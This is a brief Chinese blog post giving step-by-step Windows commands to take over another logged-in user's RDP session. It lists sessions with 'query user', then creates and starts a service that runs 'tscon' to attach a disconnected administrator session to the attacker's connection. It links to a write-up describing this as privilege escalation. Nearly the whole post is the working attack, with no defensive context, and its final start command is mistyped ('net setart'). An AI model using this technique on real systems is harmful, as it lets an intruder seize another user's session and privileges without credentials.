windows切换其他登陆用户

查看用户:

1
2
3
4
5
6
C:\Windows\system32>query user
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
administrator 1 Disc 1 3/12/2017 3:07 PM
>localadmin rdp-tcp#55 2 Active . 3/12/2017 3:10 PM

C:\Windows\system32>

创建服务:

1
2
C:\Windows\system32>sc create sesshijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#55"
[SC] CreateService SUCCESS

启动服务:

1
net setart sesshijack

细节:
http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html

------本文结束,感谢阅读------

0%